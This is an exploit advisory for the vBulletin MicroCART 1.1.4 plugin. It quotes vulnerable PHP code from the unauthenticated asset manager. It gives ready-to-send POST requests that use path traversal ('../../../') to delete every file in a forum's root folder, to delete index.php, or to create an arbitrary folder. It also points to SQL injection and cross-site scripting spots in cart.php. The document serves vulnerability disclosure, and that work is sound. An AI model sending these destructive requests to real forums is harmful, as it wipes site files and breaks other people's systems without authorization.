# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS # Date: January 8, 2015 # Exploit Author: Technidev (https://technidev.com) # Vendor Homepage: https://vbulletin.com # Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723 # Version: 1.1.4 This plugin is fairly old but still used by a lot of people and received its last update nearly 4 years ago. It’s vulnerable to arbitrary file deletion and SQL injection. *Arbitrary File(s) Deletion* In /microcart/editor/assetmanager/ are a bunch of files which are probably used to manage files/folders for the administrator, unfortunately no authentication and checks were added to see if the user should have access to it and if the request doesn’t contain anything malicious. The /microcart/editor/assetmanager/folderdel_.php file contains the following on top: $sMsg = ""; if(isset($_POST["inpCurrFolder"])) { $sDestination = pathinfo($_POST["inpCurrFolder"]); //DELETE ALL FILES IF FOLDER NOT EMPTY $dir = $_POST["inpCurrFolder"]; $handle = opendir($dir); while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file); closedir($handle); if(rmdir($_POST["inpCurrFolder"])==0) $sMsg = ""; else $sMsg = ""; } By simply sending a POST request to this file, we can delete every single file in specified folder. POST to: /microcart/editor/assetmanager/folderdel_.php POST data: inpCurrFolder: ../../../ This POST request will delete every single .php file in the root folder of vBulletin. *Arbitrary File Deletion* There’s another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this. So unlike the previous vulnerability I just wrote which deletes all files by sending a POST request with a folder value, this will only delete 1 file off the server. Vulnerable code: if(isset($_POST["inpFileToDelete"])) { $filename=pathinfo($_POST["inpFileToDelete"]); $filename=$filename['basename']; if($filename!="") unlink($currFolder . "/" . $filename); $sMsg = ""; } Exploited by sending the following request: POST to: /microcart/editor/assetmanager/assetmanager.php POST data: inpCurrFolder: ../../../ inpFileToDelete: index.php This will delete the /index.php file of vBulletin, in the root. *Aribtrary Folder Creation* Besides the file deletion, there’s a file called /microcart/editor/assetmanager/foldernew.php which created a 0755 chmodded folder on the server. The file contains the following on top: $sMsg = ""; if(isset($_POST["inpNewFolderName"])) { $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"]; if(is_dir($sFolder)==1) {//folder already exist $sMsg = ""; } else { //if(mkdir($sFolder)) if(mkdir($sFolder,0755)) $sMsg = ""; else $sMsg = ""; } } By sending the following POST request, we will create a folder with 0755 chmodded permission. POST to: /microcart/editor/assetmanager/foldernew.php POST data: inpNewFolderName: davewashere inpCurrFolder: ../../.. This POST request will create the folder davewashere in the root of the vBulletin forum. *SQL Injection* MicroCART is also vulnerable to SQL injection at several locations although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found at /cart.php line 833 to 881 and the function where you can add products to your shopping cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to the configuration variable which is later used in a query. *Cross Site Scripting* When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields. Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.